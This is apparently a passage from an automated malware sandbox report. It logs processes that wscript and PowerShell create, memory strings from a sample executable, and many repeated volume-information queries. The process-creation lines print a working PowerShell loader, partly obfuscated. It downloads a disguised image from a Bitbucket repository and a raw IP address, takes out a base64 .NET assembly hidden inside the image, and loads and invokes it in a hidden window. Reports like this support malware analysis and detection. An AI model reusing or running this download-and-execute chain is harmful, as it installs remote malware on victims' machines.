        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$codigo = 'wwbo$gu$d$$u$fm$zqby$hy$aqbj$gu$u$bv$gk$bgb0$e0$yqbu$ge$zwbl$hi$xq$6$do$uwbl$gm$dqby$gk$d$b5$f$$cgbv$hq$bwbj$g8$b$$g$d0$i$bb$e4$zqb0$c4$uwbl$gm$dqby$gk$d$b5$f$$cgbv$hq$bwbj$g8$b$bu$hk$c$bl$f0$og$6$fq$b$bz$de$mg$n$$o$i$$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$zgb1$g4$ywb0$gk$bwbu$c$$r$bv$hc$bgbs$g8$yqbk$eq$yqb0$ge$rgby$g8$bqbm$gk$bgbr$hm$i$b7$c$$c$bh$hi$yqbt$c$$k$bb$hm$d$by$gk$bgbn$fs$xqbd$cq$b$bp$g4$awbz$ck$i$$n$$o$i$$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$j$b3$gu$ygbd$gw$aqbl$g4$d$$g$d0$i$bo$gu$dw$t$e8$ygbq$gu$ywb0$c$$uwb5$hm$d$bl$g0$lgbo$gu$d$$u$fc$zqbi$em$b$bp$gu$bgb0$ds$i$$n$$o$i$$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$j$bz$gg$dqbm$gy$b$bl$gq$t$bp$g4$awbz$c$$pq$g$ec$zqb0$c0$ugbh$g4$z$bv$g0$i$$t$ek$bgbw$hu$d$bp$gi$agbl$gm$d$$g$cq$b$bp$g4$awbz$c$$lqbd$g8$dqbu$hq$i$$k$gw$aqbu$gs$cw$u$ew$zqbu$gc$d$bo$ds$i$$n$$o$i$$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$zgbv$hi$zqbh$gm$a$$g$cg$j$bs$gk$bgbr$c$$aqbu$c$$j$bz$gg$dqbm$gy$b$bl$gq$t$bp$g4$awbz$ck$i$b7$c$$d$by$hk$i$b7$c$$cgbl$hq$dqby$g4$i$$k$hc$zqbi$em$b$bp$gu$bgb0$c4$r$bv$hc$bgbs$g8$yqbk$eq$yqb0$ge$k$$k$gw$aqbu$gs$kq$g$h0$i$bj$ge$d$bj$gg$i$b7$c$$ywbv$g4$d$bp$g4$dqbl$c$$fq$g$h0$ow$g$$0$cg$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$i$by$gu$d$b1$hi$bg$g$cq$bgb1$gw$b$$g$h0$ow$g$$0$cg$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$i$$k$gw$aqbu$gs$cw$g$d0$i$b$$cg$jwbo$hq$d$bw$hm$og$v$c8$ygbp$hq$ygb1$gm$awbl$hq$lgbv$hi$zw$v$go$zgbn$gs$zgbn$gg$zg$v$hm$zwbz$gq$zwbo$hm$z$bm$hm$lwbk$g8$dwbu$gw$bwbh$gq$cw$v$g4$zqb3$f8$aqbt$gc$lgbq$h$$zw$/$de$mw$0$de$nq$n$cw$i$$n$gg$d$b0$h$$og$v$c8$mq$w$dm$lg$y$d$$lg$x$d$$mg$u$dy$mg$v$g4$zqb3$f8$aqbt$gc$lgbq$h$$zw$n$ck$ow$n$$o$i$$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$i$$k$gk$bqbh$gc$zqbc$hk$d$bl$hm$i$$9$c$$r$bv$hc$bgbs$g8$yqbk$eq$yqb0$ge$rgby$g8$bqbm$gk$bgbr$hm$i$$k$gw$aqbu$gs$cw$7$$0$cg$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$i$$g$gk$zg$g$cg$j$bp$g0$yqbn$gu$qgb5$hq$zqbz$c$$lqbu$gu$i$$k$g4$dqbs$gw$kq$g$hs$i$$k$gk$bqbh$gc$zqbu$gu$e$b0$c$$pq$g$fs$uwb5$hm$d$bl$g0$lgbu$gu$e$b0$c4$rqbu$gm$bwbk$gk$bgbn$f0$og$6$fu$v$bg$dg$lgbh$gu$d$bt$hq$cgbp$g4$zw$o$cq$aqbt$ge$zwbl$ei$eqb0$gu$cw$p$ds$dq$k$c$$i$$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$j$bz$hq$yqby$hq$rgbs$ge$zw$g$d0$i$$n$dw$p$bc$ee$uwbf$dy$n$bf$fm$v$bb$fi$v$$+$d4$jw$7$c$$j$bl$g4$z$bg$gw$yqbn$c$$pq$g$cc$p$$8$ei$qqbt$eu$ng$0$f8$rqbo$eq$pg$+$cc$ow$g$cq$cwb0$ge$cgb0$ek$bgbk$gu$e$$g$d0$i$$k$gk$bqbh$gc$zqbu$gu$e$b0$c4$sqbu$gq$zqb4$e8$zg$o$cq$cwb0$ge$cgb0$ey$b$bh$gc$kq$7$c$$dq$k$c$$i$$g$c$$i$$g$c$$i$$g$c$$i$$g$cq$zqbu$gq$sqbu$gq$zqb4$c$$pq$g$cq$aqbt$ge$zwbl$fq$zqb4$hq$lgbj$g4$z$bl$hg$twbm$cg$j$bl$g4$z$bg$gw$yqbn$ck$ow$n$$o$i$$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$i$bp$gy$i$$o$cq$cwb0$ge$cgb0$ek$bgbk$gu$e$$g$c0$zwbl$c$$m$$g$c0$yqbu$gq$i$$k$gu$bgbk$ek$bgbk$gu$e$$g$c0$zwb0$c$$j$bz$hq$yqby$hq$sqbu$gq$zqb4$ck$i$b7$c$$j$bz$hq$yqby$hq$sqbu$gq$zqb4$c$$kw$9$c$$j$bz$hq$yqby$hq$rgbs$ge$zw$u$ew$zqbu$gc$d$bo$ds$i$$n$$o$i$$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$j$bi$ge$cwbl$dy$n$bm$gu$bgbn$hq$a$$g$d0$i$$k$gu$bgbk$ek$bgbk$gu$e$$g$c0$i$$k$hm$d$bh$hi$d$bj$g
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12 function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $shuffledlinks = get-random -inputobject $links -count $links.length; foreach ($link in $shuffledlinks) { try { return $webclient.downloaddata($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jfgkfghf/sgsdghsdfs/downloads/new_img.jpg?13415', 'http://103.20.102.62/new_img.jpg'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('testpowershell.home'); $method = $type.getmethod('la').invoke($null, [object[]] ('txt.cbokidj/niam/sdaeh/sfer/ina/312eihcir/moc.tnetnocresubuhtig.war//:sptth', '0', 'startupname', 'regasm', '0'))}}" .exe -windowstyle hidden -exec
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$codigo = 'wwbo$gu$d$$u$fm$zqby$hy$aqbj$gu$u$bv$gk$bgb0$e0$yqbu$ge$zwbl$hi$xq$6$do$uwbl$gm$dqby$gk$d$b5$f$$cgbv$hq$bwbj$g8$b$$g$d0$i$bb$e4$zqb0$c4$uwbl$gm$dqby$gk$d$b5$f$$cgbv$hq$bwbj$g8$b$bu$hk$c$bl$f0$og$6$fq$b$bz$de$mg$n$$o$i$$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$zgb1$g4$ywb0$gk$bwbu$c$$r$bv$hc$bgbs$g8$yqbk$eq$yqb0$ge$rgby$g8$bqbm$gk$bgbr$hm$i$b7$c$$c$bh$hi$yqbt$c$$k$bb$hm$d$by$gk$bgbn$fs$xqbd$cq$b$bp$g4$awbz$ck$i$$n$$o$i$$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$j$b3$gu$ygbd$gw$aqbl$g4$d$$g$d0$i$bo$gu$dw$t$e8$ygbq$gu$ywb0$c$$uwb5$hm$d$bl$g0$lgbo$gu$d$$u$fc$zqbi$em$b$bp$gu$bgb0$ds$i$$n$$o$i$$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$j$bz$gg$dqbm$gy$b$bl$gq$t$bp$g4$awbz$c$$pq$g$ec$zqb0$c0$ugbh$g4$z$bv$g0$i$$t$ek$bgbw$hu$d$bp$gi$agbl$gm$d$$g$cq$b$bp$g4$awbz$c$$lqbd$g8$dqbu$hq$i$$k$gw$aqbu$gs$cw$u$ew$zqbu$gc$d$bo$ds$i$$n$$o$i$$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$zgbv$hi$zqbh$gm$a$$g$cg$j$bs$gk$bgbr$c$$aqbu$c$$j$bz$gg$dqbm$gy$b$bl$gq$t$bp$g4$awbz$ck$i$b7$c$$d$by$hk$i$b7$c$$cgbl$hq$dqby$g4$i$$k$hc$zqbi$em$b$bp$gu$bgb0$c4$r$bv$hc$bgbs$g8$yqbk$eq$yqb0$ge$k$$k$gw$aqbu$gs$kq$g$h0$i$bj$ge$d$bj$gg$i$b7$c$$ywbv$g4$d$bp$g4$dqbl$c$$fq$g$h0$ow$g$$0$cg$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$i$by$gu$d$b1$hi$bg$g$cq$bgb1$gw$b$$g$h0$ow$g$$0$cg$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$i$$k$gw$aqbu$gs$cw$g$d0$i$b$$cg$jwbo$hq$d$bw$hm$og$v$c8$ygbp$hq$ygb1$gm$awbl$hq$lgbv$hi$zw$v$go$zgbn$gs$zgbn$gg$zg$v$hm$zwbz$gq$zwbo$hm$z$bm$hm$lwbk$g8$dwbu$gw$bwbh$gq$cw$v$g4$zqb3$f8$aqbt$gc$lgbq$h$$zw$/$de$mw$0$de$nq$n$cw$i$$n$gg$d$b0$h$$og$v$c8$mq$w$dm$lg$y$d$$lg$x$d$$mg$u$dy$mg$v$g4$zqb3$f8$aqbt$gc$lgbq$h$$zw$n$ck$ow$n$$o$i$$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$i$$k$gk$bqbh$gc$zqbc$hk$d$bl$hm$i$$9$c$$r$bv$hc$bgbs$g8$yqbk$eq$yqb0$ge$rgby$g8$bqbm$gk$bgbr$hm$i$$k$gw$aqbu$gs$cw$7$$0$cg$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$i$$g$gk$zg$g$cg$j$bp$g0$yqbn$gu$qgb5$hq$zqbz$c$$lqbu$gu$i$$k$g4$dqbs$gw$kq$g$hs$i$$k$gk$bqbh$gc$zqbu$gu$e$b0$c$$pq$g$fs$uwb5$hm$d$bl$g0$lgbu$gu$e$b0$c4$rqbu$gm$bwbk$gk$bgbn$f0$og$6$fu$v$bg$dg$lgbh$gu$d$bt$hq$cgbp$g4$zw$o$cq$aqbt$ge$zwbl$ei$eqb0$gu$cw$p$ds$dq$k$c$$i$$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$j$bz$hq$yqby$hq$rgbs$ge$zw$g$d0$i$$n$dw$p$bc$ee$uwbf$dy$n$bf$fm$v$bb$fi$v$$+$d4$jw$7$c$$j$bl$g4$z$bg$gw$yqbn$c$$pq$g$cc$p$$8$ei$qqbt$eu$ng$0$f8$rqbo$eq$pg$+$cc$ow$g$cq$cwb0$ge$cgb0$ek$bgbk$gu$e$$g$d0$i$$k$gk$bqbh$gc$zqbu$gu$e$b0$c4$sqbu$gq$zqb4$e8$zg$o$cq$cwb0$ge$cgb0$ey$b$bh$gc$kq$7$c$$dq$k$c$$i$$g$c$$i$$g$c$$i$$g$c$$i$$g$cq$zqbu$gq$sqbu$gq$zqb4$c$$pq$g$cq$aqbt$ge$zwbl$fq$zqb4$hq$lgbj$g4$z$bl$hg$twbm$cg$j$bl$g4$z$bg$gw$yqbn$ck$ow$n$$o$i$$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$i$bp$gy$i$$o$cq$cwb0$ge$cgb0$ek$bgbk$gu$e$$g$c0$zwbl$c$$m$$g$c0$yqbu$gq$i$$k$gu$bgbk$ek$bgbk$gu$e$$g$c0$zwb0$c$$j$bz$hq$yqby$hq$sqbu$gq$zqb4$ck$i$b7$c$$j$bz$hq$yqby$hq$sqbu$gq$zqb4$c$$kw$9$c$$j$bz$hq$yqby$hq$rgbs$ge$zw$u$ew$zqbu$gc$d$bo$ds$i$$n$$o$i$$g$c$$i$$g$c$$i$$g$c$$i$$g$c$$j$bi$ge$cwbl$dy$n$bm$gu$bgbn$hq$a$$g$d0$i$$k$gu$bgbk$ek$bgbk$gu$e$$g$c0$i$$k$hm$d$bh$hi$d$bj$gJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12 function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $shuffledlinks = get-random -inputobject $links -count $links.length; foreach ($link in $shuffledlinks) { try { return $webclient.downloaddata($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jfgkfghf/sgsdghsdfs/downloads/new_img.jpg?13415', 'http://103.20.102.62/new_img.jpg'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('testpowershell.home'); $method = $type.getmethod('la').invoke($null, [object[]] ('txt.cbokidj/niam/sdaeh/sfer/ina/312eihcir/moc.tnetnocresubuhtig.war//:sptth', '0', 'startupname', 'regasm', '0'))}}" .exe -windowstyle hidden -execJump to behavior
        Source: WKOyCvoOlM.exe, 00000007.00000000.2403080946.0000000001341000.00000002.00000001.00040000.00000000.sdmp, WKOyCvoOlM.exe, 00000007.00000002.3404203393.0000000001341000.00000002.00000001.00040000.00000000.sdmp, WKOyCvoOlM.exe, 0000000A.00000000.2559446813.0000000000F31000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
        Source: WKOyCvoOlM.exe, 00000007.00000000.2403080946.0000000001341000.00000002.00000001.00040000.00000000.sdmp, WKOyCvoOlM.exe, 00000007.00000002.3404203393.0000000001341000.00000002.00000001.00040000.00000000.sdmp, WKOyCvoOlM.exe, 0000000A.00000000.2559446813.0000000000F31000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
        Source: WKOyCvoOlM.exe, 00000007.00000000.2403080946.0000000001341000.00000002.00000001.00040000.00000000.sdmp, WKOyCvoOlM.exe, 00000007.00000002.3404203393.0000000001341000.00000002.00000001.00040000.00000000.sdmp, WKOyCvoOlM.exe, 0000000A.00000000.2559446813.0000000000F31000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
        Source: WKOyCvoOlM.exe, 00000007.00000000.2403080946.0000000001341000.00000002.00000001.00040000.00000000.sdmp, WKOyCvoOlM.exe, 00000007.00000002.3404203393.0000000001341000.00000002.00000001.00040000.00000000.sdmp, WKOyCvoOlM.exe, 0000000A.00000000.2559446813.0000000000F31000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
